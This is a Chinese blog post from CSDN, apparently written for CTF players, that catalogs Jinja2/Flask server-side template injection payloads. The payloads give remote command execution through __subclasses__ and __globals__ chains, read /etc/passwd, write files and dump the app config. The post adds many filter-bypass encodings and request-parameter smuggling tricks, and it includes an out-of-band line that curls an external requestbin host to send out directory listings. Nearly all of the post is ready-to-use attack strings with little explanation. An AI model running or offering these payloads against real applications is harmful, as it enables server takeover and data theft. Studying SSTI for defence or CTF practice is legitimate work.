Jinja2模板注入

已于 2023-05-28 15:58:59 修改
阅读量1.5k 收藏 6
点赞数 1
文章标签: python flask 网络安全
于 2022-10-25 21:05:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qoolloop/article/details/127521576
版权

Jinja2模板注入模板引擎种类

__class__ : 返回对象所属的类
__mro__ : 返回一个类所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__ : 返回该类所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__(): 获取类的所有子类
__init__ : 所有自带的类都包含init方法,常用它当跳板来调用globals
__globals__ : 返回当前位置的全部模块,方法和全局变量,用于配合init使用

Jinja2模板注入环节(Flask):

Jinja {{7*'7'}} #输出7777777

1. 使用str,list,tuple,dict中的一种去获取内置类

"".__class__

2. 获取object基类(两种办法)

一:使用__base__获取
"".__class__.__base__
二:使用__bases__获取
"".__bases__[0]
三:使用__mro__获取
"".__class__.__mro__这样先查看获取到的数据,确定object类在list中的第几个
"".__class__.__mro__[1]

3. 获取子类列表:

"".__class__.__base__.__subclasses__()
"".__class__.__bases__[0].__subclasses__()
"".__class__.__mro__[1].__subclasses__()

4. 寻找getshell类:subprocess.Popen、site._Printer、_sitebuiltins._Printer、os.system方法

5. 找到可以getshell的类了,那么接下来就是初始化这个类,开始getshell

{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__['popen']('whoami').read()}}
{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__.__import__('os').popen('whoami').read()}}
num的具体数值根据shell类在subclasses中index确定(注意index是从0开启计数)

0<class '_sitebuiltins._Printer'> 执行命令
{{''.__class__.__base__.__subclasses__()[80].__init__.__globals__['__builtins__'].eval("__import__('os').popen('whoami').read()")}}

1<type 'file'> 读写文件,file类位置一般为40,直接调用
{{"".__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}
{{().__class__.__base__.__subclasses__()[40]('/var/www/html/input.txt', 'w').write('hello123')}}

2<class 'site._Printer'> 直接用os的popen执行命令(绕过globals)
{{"".__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
如果system被过滤,用os的listdir读取目录+file模块读取文件:
{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

3<class 'subprocess.Popen'> 执行命令
{{''.__class__.__mro__[1].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

4<class 'warnings.catch_warnings'> 执行命令
调用eval
{{[].__class__.__base__.__subclasses__()[59].__init__['__globals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
{{''.__class__.__base__.__subclasses__()[59].__init__.__globals__.__builtins__['__import__']('os').__dict__['popen']('ls').read()}}

# 读写文件 read(),write()
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['__builtins__'].['file']('/etc/passwd').read()}}

调用system方法。(不包含system,可以绕过过滤system的情况)
{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}}
利用commands进行命令执行
{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

通用办法,使用for循环查找shell类 (去掉换行)

?name=
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("env").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

常见payload

1. 获取配置

{{config}}
{{handler.settings}}
{{self.__dict__._TemplateReference__context.config}}
{{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ}}
{{url_for.__globals__['current_app'].config}}
{{get_flashed_messages.__globals__['current_app'].config}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config}}

2. 命令执行or文件读取

python2

[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')
[].__class__.__base__.__subclasses__()[76].__init__.__globals__['os'].system('ls')
"".__class__.__mro__[-1].__subclasses__()[60].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
"".__class__.__mro__[-1].__subclasses__()[61].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
"".__class__.__mro__[-1].__subclasses__()[40](filename).read()
"".__class__.__mro__[-1].__subclasses__()[29].__call__(eval,'os.system("ls")')

python3

''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.values()[13]['eval']
"".__class__.__mro__[-1].__subclasses__()[117].__init__.__globals__['__builtins__']['eval']

常见绕过:

过滤关键字如“class”、“config”、“eval”、"os"等

1.没过滤引号,使用其他进制,可以使用[]加一下字符反转其他进制绕过

1.1 其他进制

   ''.__class__ => ''["\137\137\143\154\141\163\163\137\137"](8进制)
   ''.__class__ => ''["\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f"](16进制)
    {{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x5f\x5f']['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[80]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x65\x76\x61\x6c']("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x6c\x73\x27\x29")['\x72\x65\x61\x64']()}}

1.2 字符反转

   ''.__class__ => ''["__ssalc__"[::-1]]

1.3 字符串拼接

   ''.__class__ => ''["__cla""ss__"]
   {{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['__buil'+'tins__'[::-1]]['eval']('__import__("os").popen("ls").read()')}}

1.4 base64 rot13 hex

   ''.__class__ => ''['X19jbGFzc19f'.decode('base64')]

1.5 lower

   ''.__class__ => ''["__CLASS__"|lower]

1.6 join

   ''.__class__ => ''[["__clas","s__"]|join]  or ''[("__clas","s__")|join]

1.7 format

   ''.__class__ => ''["%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95)]

1.8 replace reverse

   ''.__class__ => ''|attr("__ssalc__"|reverse)

2.过滤了引号,通过request将所需的变量从请求中其他参数获得

2.1 主要利用一下几种

    request.args.x1       get传参
    request.values.x1     post传参
    request.cookies
    request.form.x1       post传参    (Content-Type:applicaation/x-www-form-urlencoded或   multipart/form-data)
    request.data          post传参    (Content-Type:a/b)
    request.json        post传json  (Content-Type: application/json)

2.2 利用request和attr构造payload

//get {{request|attr((request.args.application)|join)|attr((request.args.usc*2,request.args.globals,request.args.usc*2)|join)|attr((request.args.usc*2,request.args.getitem,request.args.usc*2)|join)((request.args.usc*2,request.args.builtins,request.args.usc*2)|join)|attr((request.args.usc*2,request.args.getitem,request.args.usc*2)|join)((request.args.usc*2,request.args.import,request.args.usc*2)|join)((request.args.os)|join)|attr((request.args.popen)|join)((request.args.id)|join)|attr((request.args.read)|join)()}}&usc=_&application=application&globals=globals&getitem=getitem&builtins=builtins&import=import&os=os&popen=popen&id=cat%20flag.txt&read=read
//post

{{request|attr((request.values.application)|join)|attr((request.values.usc*2,request.values.globals,request.values.usc*2)|join)|attr((request.values.usc*2,request.values.getitem,request.values.usc*2)|join)((request.values.usc*2,request.values.builtins,request.values.usc*2)|join)|attr((request.values.usc*2,request.values.getitem,request.values.usc*2)|join)((request.values.usc*2,request.values.import,request.values.usc*2)|join)((request.values.os)|join)|attr((request.values.popen)|join)((request.values.id)|join)|attr((request.values.read)|join)()}}

post: usc=_&application=application&globals=globals&getitem=getitem&builtins=builtins&import=import&os=os&popen=popen&id=cat%20flag.txt&read=read
//其他的也类似

过滤[]

1. getitem

{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(59).__init__.func_globals.values().__getitem__(13).__getitem__('eval')('__import__("os").popen("cat /flag").read()')}}

2. pop

{{().__class__.__bases__.pop(0).__subclasses__().pop(59).__init__.func_globals.values().pop(13).pop('eval')('__import__("os").popen("cat /flag").read()')}}

3. get

4. setdefault

过滤点 .

1. []

''.__class__ => ''["__class__"]

2. attr

 ''.__class__ => ''|attr('__class__') or getattr('',"__class__")

过滤_

利用request.args属性

{{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__
将其中的request.args改为request.values则利用post的方式进行传参

过滤{{}}

•使用{%%}外带数据或盲注
//外带
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://http.bin.buuoj.cn/1inhq4f1 -d `ls / |  grep flag`;') %}1{% endif %}
//盲注
{% if ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/test').read()[0:1]=='p' %}1{% endif %}
//打印
{%print config%}
搬砖没有未来
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
jinja2模板注入_flask/jinja2模板注入
weixin_30802953的博客
01-17 694
Flask是什么Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。就是部网站用的简单hello worldfrom flask import Flaskapp = Flask(__name__)@app.route("/")def hello():return "Hello World!"if __na...
jinja2模板注入_Flask jinja2 模板注入思路总结
weixin_32784349的博客
01-17 487
Flask jinja2 模板注入思路总结前言虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找去也走了些弯路, 小白们可以参考一下如果有什么错误, 欢迎各位指正漏洞简介漏洞原理可以参考http://www.freebuf.com/articles/web/98619.htmlhttp://www....
jinja2模板注入_Flask jinja2模板注入思路总结
weixin_32724679的博客
01-17 518
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言虽然这个漏洞已经出现很久了,不过偶尔还是能够看到。翻了翻freebuf上好像只有python2的一些payload,方法也不是很全。我找来找去也走了些弯路,小白们可以参考一下。如果有什么错误,欢迎各位指正。漏洞简介漏洞原理可以参考常见payloadssti可以用于xss,不过这里...
Flask jinja2模板注入思路总结
weixin_53146913的博客
05-12 1134
一、总结一下常用的payload: python2: 读写文件: #读文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} #写文件: {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }} 也可以通过写jinja2的environment.py执行命令; jinja2模板会load这个module,而且这个en
Web安全基础学习:SSTI模板注入漏洞之JINJA2模板注入
最新发布
qq_51862722的博客
06-24 1087
SSTI为服务端模板注入攻击,它主要是由于框架的不规范使用而导致的。主要为python的一些框架,如 jinja2 mako tornado django flask、PHP框架smarty twig thinkphp、java框架jade velocity spring等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。
SSTI模板注入(jinja2)
weixin_74020633的博客
03-30 896
前面学习了SSTI中的smarty类型,今天学习了Jinja2,两种类型都是flask框架的,但是在注入的语法上还是有不同SSTI:服务器端模板注入,也属于一种注入类型。与sql注入类似,也是通过凭借进行命令的执行,sql是和数据库的查询语句进行拼接。SSTI是在后端的渲染进行拼接,SSTI主要是运用在目前的网站框架下。经过查询资料,SSTI漏洞产生的原因:因为在函数渲染时,对于用户输入的变量没有进行渲染,才会导致漏洞的出现附上一张经典判断SSTI模板类型的图。
简单理解Flask Jinja2服务端模板注入(SSTI)
BerL1n
09-24 687
对于表示层,Flask利用Jinga2引擎,其使用方便,自动转义.html,htm,xml以及.xhtml文件中的内容。Flask允许在Python源代码中使用HTML字符串创建模版,Flask内部使用本地线程对象,这样就可以不用为了线程安全的缘故在同一个请求中在函数之间传递对象。 服务端模版注入 Flask框架中提供的模版引擎可能会被一些无量开发者利用引入一个服务端模版注入漏洞,如果对此感到有些...
pythonjinja2
05-21
6. **沙盒模式**:为了提高安全性,Jinja2支持沙盒模式,限制了模板中可以使用的部分Python功能,防止恶意用户通过模板注入代码。 7. **模板调试**:Jinja2提供了良好的调试工具,能够帮助开发者追踪模板渲染过程中...
jinja2pp:Jinja2 ++
04-04
Jinja2 ++是用于使用变量优先级进行模板化的单文件解决方案中的一滴。 您可以使用任何语言!怎么运行的基于Unix管道: JSON - stdin |> stdout - JSON var_file是从STDIN提取JSON并从STD吐出JSON的任何可执行文件。 ...
模板注入与_FLASK.pdf
08-08
本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 ...
envtpl, 在带有 shell 环境变量的命令行 上,渲染jinja2模板.zip
09-18
envtpl, 在带有 shell 环境变量的命令行 上,渲染jinja2模板 envtpl在 命令行 上使用 shell 环境变量 jinja2模板。 安装pip install envtpl如何假设你有一个名为 whatever.conf的配置文件,foo = 123
Python-Jinja2是纯Python模板引擎
08-10
为了提高安全性,Jinja2提供了一个沙盒模式,可以限制模板中的代码执行权限,防止恶意用户通过模板注入攻击。在沙盒环境中,某些Python操作,如文件系统访问或网络通信,会被禁止。 **4. 模板继承与块** Jinja2的...
tera:基于Jinja2Django的Rust模板引擎
02-05
Tera是一款强大的模板引擎,其设计灵感来源于Python中的Jinja2和Django模板系统,但在实现上,它采用的是高效的Rust编程语言。本文将深入探讨Tera的相关知识点,包括其设计理念、功能特性、与Jinja2和Django的关联、...
Jinja2模板注入 | python模板注入特殊属性 / 对象讲解
qq_56313338的博客
10-16 345
在进行模板利用的时候需要使用特殊的属性和对象进行利用,这里对这些特殊属性及方法进行讲解以下实验输出
Flask(Jinja2) 服务端模板注入漏洞 复现
m0_46580995的博客
07-19 310
Flask(Jinja2) 服务端模板注入漏洞 复现环境vulhub 访问ip/?name={{a*b}} 使用tplmap一把梭 `from flask import Flask, request from jinja2 import Template app = Flask(name) @app.route("/") def index(): name = request.args.get(‘name’, ‘guest’) t = Template("Hello " + name) return t.r
SSTI模板注入基础(Flask+Jinja2
qq_55202378的博客
12-22 931
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
FlaskJinja2模板中传入数据
TCatTime的博客
08-24 2209
FlaskJinja2模板中传入数据介绍和演示。
flaskjinja2过滤器使用:遍历索引指定标签class属性,实现样式变化
mzfly的博客
11-22 999
flaskjinja2过滤器使用:遍历索引指定标签class属性,实现样式变化 在flask项目中实现上图效果,采用使用自定义过滤器的形式对 span 标签的 class 指定。 1、定义过滤器 # common.py def do_index_class(index): """自定义过滤器""" if index == 0...
Jinja2模板语言中文文档详解
Jinja2是一个强大的Python模板引擎,它的设计灵感来源于Django模板语言,旨在提供一个高效、安全的环境来生成动态内容。Jinja2强调了易用性和性能,同时具有丰富的功能,如沙箱模式、HTML自动转义以防止跨站脚本攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

搬砖没有未来

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值